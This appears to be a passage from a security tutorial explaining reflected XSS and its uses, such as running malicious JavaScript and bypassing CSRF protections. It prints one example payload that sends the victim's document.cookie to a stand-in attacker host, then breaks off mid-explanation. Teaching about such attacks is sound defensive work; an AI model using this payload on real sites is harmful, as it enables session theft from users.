Reflected XSS
Reflected XSS is one of the most widely exploited web application vulnerabilities. To exploit this vulnerability, the application takes one or more parameters as an input, which is reflected back to the web page generated by the application. This may not sound harmful at the moment but this vulnerability can be exploited to do one of the following things or more:
- Execute malicious JavaScript
- Execute client-side exploits
- Bypass CSRF protections
- Temporary defacements and other nuisance
The first instance is of quite concern, as this allows a hacker to execute client-side JavaScript code of his choice to be rendered and executed by the browser of the victim or the viewer viewing the page. In this case, it gets worse when the session or other essential cookies of the user are available to be stolen through the document.cookie property of JavaScript. Consider the following JavaScript code:
window.location='http://evil.example.com/?cookie='+document.cookieThis code, if executed...
